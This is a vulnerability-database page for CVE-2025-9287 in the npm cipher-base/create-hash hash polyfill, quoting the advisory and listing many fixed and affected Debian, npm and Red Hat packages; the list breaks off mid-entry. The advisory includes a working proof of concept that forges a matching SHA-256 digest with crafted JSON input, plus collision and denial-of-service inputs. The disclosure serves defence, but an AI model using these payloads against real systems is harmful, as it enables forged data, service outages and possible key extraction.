Django REST framework

Lookup for vulnerabilities affecting packages.

Vulnerability_id VCID-tt31-4d54-k7cz

Summary

cipher-base is missing type checks, leading to hash rewind and passing on crafted data
### Summary

This affects e.g. `create-hash` (and `crypto-browserify`), so I'll describe the issue against that package
Also affects `create-hmac` and other packages

Node.js `createHash` works only on strings or instances of Buffer, TypedArray, or DataView.

Missing input type checks (in npm `create-hash` polyfill of Node.js `createHash`) can allow types other than a well-formed `Buffer` or `string`, resulting in invalid values, hanging and rewinding the hash state (including turning a tagged hash into an untagged hash), or other generally undefined behaviour.

### Details

See PoC

### PoC
```js
const createHash = require('create-hash/browser.js')
const { randomBytes } = require('crypto')

const sha256 = (...messages) => {
  const hash = createHash('sha256')
  messages.forEach((m) => hash.update(m))
  return hash.digest('hex')
}

const validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever

const payload = forgeHash(Buffer.concat(validMessage), 'Hashed input means safe')
const receivedMessage = JSON.parse(payload) // e.g. over network, whatever

console.log(sha256(...validMessage))
console.log(sha256(...receivedMessage))
console.log(receivedMessage[0])
```

Output:
```
9ef59a6a745990b09bbf1d99abe43a4308b48ce365935e29eb4c9000984ee9a9
9ef59a6a745990b09bbf1d99abe43a4308b48ce365935e29eb4c9000984ee9a9
Hashed input means safe
```

This works with:
```js
const forgeHash = (valid, wanted) => JSON.stringify([wanted, { length: -wanted.length }, { ...valid, length: valid.length }])
```

But there are other types of input which lead to unchecked results

### Impact

1. Hash state rewind on `{length: -x}`. This is behind the PoC above, also this way an attacker can turn a tagged hash in cryptographic libraries into an untagged hash.
2. Value miscalculation, e.g. a collision is generated by `{ length: buf.length, ...buf, 0: buf[0] + 256 }`
    This will result in the same hash as of `buf`, but can be treated by other code differently (e.g. bn.js)
4. DoS on `{length:'1e99'}`
5. On a subsequent system, (2) can turn into matching hashes but different numeric representations, leading to issues up to private key extraction from cryptography libraries (as nonce is often generated through a hash, and matching nonces for different values often immediately leads to private key restoration, like [GHSA-vjh7-7g9h-fjfh](https://github.com/indutny/elliptic/security/advisories/GHSA-vjh7-7g9h-fjfh))
6. Also, other typed arrays results are invalid, e.g. returned hash of `new Uint16Array(5)` is the same as `new Uint8Array(5)`, not `new Uint16Array(10)` as it should have been (and is in Node.js `crypto`) -- same for arrays with values non-zero, their hashes are just truncated to `%256` instead of converted to correct bytelength

Aliases

alias	CVE-2025-9287

alias	GHSA-cpq7-6gpm-g9rc

Fixed_packages

url	pkg:deb/debian/node-cipher-base@1.0.4-4?distro=trixie
purl	pkg:deb/debian/node-cipher-base@1.0.4-4?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-cipher-base@1.0.4-4%3Fdistro=trixie

url	pkg:deb/debian/node-cipher-base@1.0.4-4%2Bdeb11u1?distro=trixie
purl	pkg:deb/debian/node-cipher-base@1.0.4-4%2Bdeb11u1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-cipher-base@1.0.4-4%252Bdeb11u1%3Fdistro=trixie

url	pkg:deb/debian/node-cipher-base@1.0.4-6%2Bdeb12u1?distro=trixie
purl	pkg:deb/debian/node-cipher-base@1.0.4-6%2Bdeb12u1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-cipher-base@1.0.4-6%252Bdeb12u1%3Fdistro=trixie

url	pkg:deb/debian/node-cipher-base@1.0.4-6%2Bdeb12u1
purl	pkg:deb/debian/node-cipher-base@1.0.4-6%2Bdeb12u1
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-cipher-base@1.0.4-6%252Bdeb12u1

url	pkg:deb/debian/node-cipher-base@1.0.4-6%2Bdeb13u1?distro=trixie
purl	pkg:deb/debian/node-cipher-base@1.0.4-6%2Bdeb13u1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-cipher-base@1.0.4-6%252Bdeb13u1%3Fdistro=trixie

url	pkg:deb/debian/node-cipher-base@1.0.6-1?distro=trixie
purl	pkg:deb/debian/node-cipher-base@1.0.6-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-cipher-base@1.0.6-1%3Fdistro=trixie

url	pkg:deb/debian/node-cipher-base@1.0.6%2B~1.0.3-1?distro=trixie
purl	pkg:deb/debian/node-cipher-base@1.0.6%2B~1.0.3-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-cipher-base@1.0.6%252B~1.0.3-1%3Fdistro=trixie

url	pkg:npm/cipher-base@1.0.5
purl	pkg:npm/cipher-base@1.0.5
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:npm/cipher-base@1.0.5

Affected_packages

url pkg:deb/debian/node-cipher-base@1.0.4-3

purl pkg:deb/debian/node-cipher-base@1.0.4-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-cipher-base@1.0.4-3

url pkg:deb/debian/node-cipher-base@1.0.4-4

purl pkg:deb/debian/node-cipher-base@1.0.4-4

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-cipher-base@1.0.4-4

url pkg:npm/cipher-base@1.0.0

purl pkg:npm/cipher-base@1.0.0

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/cipher-base@1.0.0

url pkg:npm/cipher-base@1.0.1

purl pkg:npm/cipher-base@1.0.1

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/cipher-base@1.0.1

url pkg:npm/cipher-base@1.0.2

purl pkg:npm/cipher-base@1.0.2

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/cipher-base@1.0.2

url pkg:npm/cipher-base@1.0.3

purl pkg:npm/cipher-base@1.0.3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/cipher-base@1.0.3

url pkg:npm/cipher-base@1.0.4

purl pkg:npm/cipher-base@1.0.4

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/cipher-base@1.0.4

url pkg:rpm/redhat/acm-cli@container-v2.12?arch=5-4

purl pkg:rpm/redhat/acm-cli@container-v2.12?arch=5-4

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-cli@container-v2.12%3Farch=5-4

url pkg:rpm/redhat/acm-cluster-permission@container-v2.12?arch=5-4

purl pkg:rpm/redhat/acm-cluster-permission@container-v2.12?arch=5-4

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-cluster-permission@container-v2.12%3Farch=5-4

url pkg:rpm/redhat/acm-governance-policy-addon-controller@container-v2.12?arch=5-3

purl pkg:rpm/redhat/acm-governance-policy-addon-controller@container-v2.12?arch=5-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-governance-policy-addon-controller@container-v2.12%3Farch=5-3

url pkg:rpm/redhat/acm-governance-policy-framework-addon@container-v2.12?arch=5-4

purl pkg:rpm/redhat/acm-governance-policy-framework-addon@container-v2.12?arch=5-4

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-governance-policy-framework-addon@container-v2.12%3Farch=5-4

url pkg:rpm/redhat/acm-grafana@container-v2.12?arch=5-3

purl pkg:rpm/redhat/acm-grafana@container-v2.12?arch=5-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-grafana@container-v2.12%3Farch=5-3

url pkg:rpm/redhat/acm-multicluster-observability-addon@container-v2.12?arch=5-4

purl pkg:rpm/redhat/acm-multicluster-observability-addon@container-v2.12?arch=5-4

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-multicluster-observability-addon@container-v2.12%3Farch=5-4

url pkg:rpm/redhat/acm-must-gather@container-v2.12?arch=5-3

purl pkg:rpm/redhat/acm-must-gather@container-v2.12?arch=5-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-must-gather@container-v2.12%3Farch=5-3

url pkg:rpm/redhat/acm-operator-bundle@container-v2.12?arch=5-9

purl pkg:rpm/redhat/acm-operator-bundle@container-v2.12?arch=5-9

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-operator-bundle@container-v2.12%3Farch=5-9

url pkg:rpm/redhat/acm-prometheus-config-reloader@container-v2.12?arch=5-3

purl pkg:rpm/redhat/acm-prometheus-config-reloader@container-v2.12?arch=5-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-prometheus-config-reloader@container-v2.12%3Farch=5-3

url pkg:rpm/redhat/acm-prometheus-operator@container-v2.12?arch=5-3

purl pkg:rpm/redhat/acm-prometheus-operator@container-v2.12?arch=5-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-prometheus-operator@container-v2.12%3Farch=5-3

url pkg:rpm/redhat/acm-search-indexer@container-v2.12?arch=5-3

purl pkg:rpm/redhat/acm-search-indexer@container-v2.12?arch=5-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-search-indexer@container-v2.12%3Farch=5-3

url pkg:rpm/redhat/acm-search-v2-api@container-v2.12?arch=5-3

purl pkg:rpm/redhat/acm-search-v2-api@container-v2.12?arch=5-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-search-v2-api@container-v2.12%3Farch=5-3

url pkg:rpm/redhat/acm-search-v2-operator@container-v2.12?arch=5-3

purl pkg:rpm/redhat/acm-search-v2-operator@container-v2.12?arch=5-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-search-v2-operator@container-v2.12%3Farch=5-3

url pkg:rpm/redhat/acm-siteconfig@container-v2.12?arch=5-3

purl pkg:rpm/redhat/acm-siteconfig@container-v2.12?arch=5-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-siteconfig@container-v2.12%3Farch=5-3

url pkg:rpm/redhat/acm-volsync-addon-controller@container-v2.12?arch=5-3

purl pkg:rpm/redhat/acm-volsync-addon-controller@container-v2.12?arch=5-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-volsync-addon-controller@container-v2.12%3Farch=5-3

url pkg:rpm/redhat/cert-policy-controller@container-v2.12?arch=5-4

purl pkg:rpm/redhat/cert-policy-controller@container-v2.12?arch=5-4

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/cert-policy-controller@container-v2.12%3Farch=5-4

url pkg:rpm/redhat/cluster-backup-operator@container-v2.12?arch=5-3

purl pkg:rpm/redhat/cluster-backup-operator@container-v2.12?arch=5-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/cluster-backup-operator@container-v2.12%3Farch=5-3

url pkg:rpm/redhat/config-policy-controller@container-v2.12?arch=5-4

purl pkg:rpm/redhat/config-policy-controller@container-v2.12?arch=5-4

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/config-policy-controller@container-v2.12%3Farch=5-4

url pkg:rpm/redhat/console@container-v2.12?arch=5-5

purl pkg:rpm/redhat/console@container-v2.12?arch=5-5

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/console@container-v2.12%3Farch=5-5

url pkg:rpm/redhat/endpoint-monitoring-operator@container-v2.12?arch=5-3

purl pkg:rpm/redhat/endpoint-monitoring-operator@container-v2.12?arch=5-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/endpoint-monitoring-operator@container-v2.12%3Farch=5-3

url pkg:rpm/redhat/governance-policy-propagator@container-v2.12?arch=5-3

purl pkg:rpm/redhat/governance-policy-propagator@container-v2.12?arch=5-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/governance-policy-propagator@container-v2.12%3Farch=5-3

url pkg:rpm/redhat/grafana-dashboard-loader@container-v2.12?arch=5-3

purl pkg:rpm/redhat/grafana-dashboard-loader@container-v2.12?arch=5-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/grafana-dashboard-loader@container-v2.12%3Farch=5-3

url pkg:rpm/redhat/insights-client@container-v2.12?arch=5-3

purl pkg:rpm/redhat/insights-client@container-v2.12?arch=5-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/insights-client@container-v2.12%3Farch=5-3

url pkg:rpm/redhat/insights-metrics@container-v2.12?arch=5-4

purl pkg:rpm/redhat/insights-metrics@container-v2.12?arch=5-4

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/insights-metrics@container-v2.12%3Farch=5-4

url pkg:rpm/redhat/klusterlet-addon-controller@container-v2.12?arch=5-3

purl pkg:rpm/redhat/klusterlet-addon-controller@container-v2.12?arch=5-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/klusterlet-addon-controller@container-v2.12%3Farch=5-3

url pkg:rpm/redhat/kube-rbac-proxy@container-v2.12?arch=5-3

purl pkg:rpm/redhat/kube-rbac-proxy@container-v2.12?arch=5-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/kube-rbac-proxy@container-v2.12%3Farch=5-3

url pkg:rpm/redhat/kube-state-metrics@container-v2.12?arch=5-3

purl pkg:rpm/redhat/kube-state-metrics@container-v2.12?arch=5-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/kube-state-metrics@container-v2.12%3Farch=5-3

url pkg:rpm/redhat/memcached-exporter@container-v2.12?arch=5-4

purl pkg:rpm/redhat/memcached-exporter@container-v2.12?arch=5-4

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/memcached-exporter@container-v2.12%3Farch=5-4

url pkg:rpm/redhat/metrics-collector@container-v2.12?arch=5-4

purl pkg:rpm/redhat/metrics-collector@container-v2.12?arch=5-4

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/metrics-collector@container-v2.12%3Farch=5-4

url pkg:rpm/redhat/multicloud-integrations@container-v2.12?arch=5-3

purl pkg:rpm/redhat/multicloud-integrations@container-v2.12?arch=5-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicloud-integrations@container-v2.12%3Farch=5-3

url pkg:rpm/redhat/multicluster-engine-addon-manager@container-v2.7?arch=6-3

purl pkg:rpm/redhat/multicluster-engine-addon-manager@container-v2.7?arch=6-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-addon-manager@container-v2.7%3Farch=6-3

url pkg:rpm/redhat/multicluster-engine-assisted-image-service@container-v2.7?arch=6-3

purl pkg:rpm/redhat/multicluster-engine-assisted-image-service@container-v2.7?arch=6-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-assisted-image-service@container-v2.7%3Farch=6-3

url pkg:rpm/redhat/multicluster-engine-assisted-installer@container-v2.7?arch=6-3

purl pkg:rpm/redhat/multicluster-engine-assisted-installer@container-v2.7?arch=6-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-assisted-installer@container-v2.7%3Farch=6-3

url pkg:rpm/redhat/multicluster-engine-assisted-installer-agent@container-v2.7?arch=6-3

purl pkg:rpm/redhat/multicluster-engine-assisted-installer-agent@container-v2.7?arch=6-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-assisted-installer-agent@container-v2.7%3Farch=6-3

url pkg:rpm/redhat/multicluster-engine-assisted-installer-controller@container-v2.7?arch=6-3

purl pkg:rpm/redhat/multicluster-engine-assisted-installer-controller@container-v2.7?arch=6-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-assisted-installer-controller@container-v2.7%3Farch=6-3

url pkg:rpm/redhat/multicluster-engine-assisted-service-8@container-v2.7?arch=6-2

purl pkg:rpm/redhat/multicluster-engine-assisted-service-8@container-v2.7?arch=6-2

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-assisted-service-8@container-v2.7%3Farch=6-2

url pkg:rpm/redhat/multicluster-engine-assisted-service-9@container-v2.7?arch=6-3

purl pkg:rpm/redhat/multicluster-engine-assisted-service-9@container-v2.7?arch=6-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-assisted-service-9@container-v2.7%3Farch=6-3

url pkg:rpm/redhat/multicluster-engine-cluster-api-provider-agent@container-v2.7?arch=6-3

purl pkg:rpm/redhat/multicluster-engine-cluster-api-provider-agent@container-v2.7?arch=6-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-cluster-api-provider-agent@container-v2.7%3Farch=6-3

url pkg:rpm/redhat/multicluster-engine-cluster-api-provider-kubevirt@container-v2.7?arch=6-3

purl pkg:rpm/redhat/multicluster-engine-cluster-api-provider-kubevirt@container-v2.7?arch=6-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-cluster-api-provider-kubevirt@container-v2.7%3Farch=6-3

url pkg:rpm/redhat/multicluster-engine-clusterclaims-controller@container-v2.7?arch=6-3

purl pkg:rpm/redhat/multicluster-engine-clusterclaims-controller@container-v2.7?arch=6-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-clusterclaims-controller@container-v2.7%3Farch=6-3

url pkg:rpm/redhat/multicluster-engine-cluster-curator-controller@container-v2.7?arch=6-3

purl pkg:rpm/redhat/multicluster-engine-cluster-curator-controller@container-v2.7?arch=6-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-cluster-curator-controller@container-v2.7%3Farch=6-3

url pkg:rpm/redhat/multicluster-engine-cluster-image-set-controller@container-v2.7?arch=6-3

purl pkg:rpm/redhat/multicluster-engine-cluster-image-set-controller@container-v2.7?arch=6-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-cluster-image-set-controller@container-v2.7%3Farch=6-3

url pkg:rpm/redhat/multicluster-engine-clusterlifecycle-state-metrics@container-v2.7?arch=6-4

purl pkg:rpm/redhat/multicluster-engine-clusterlifecycle-state-metrics@container-v2.7?arch=6-4

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-clusterlifecycle-state-metrics@container-v2.7%3Farch=6-4

url pkg:rpm/redhat/multicluster-engine-cluster-proxy@container-v2.7?arch=6-4

purl pkg:rpm/redhat/multicluster-engine-cluster-proxy@container-v2.7?arch=6-4

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-cluster-proxy@container-v2.7%3Farch=6-4

url pkg:rpm/redhat/multicluster-engine-cluster-proxy-addon@container-v2.7?arch=6-4

purl pkg:rpm/redhat/multicluster-engine-cluster-proxy-addon@container-v2.7?arch=6-4

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

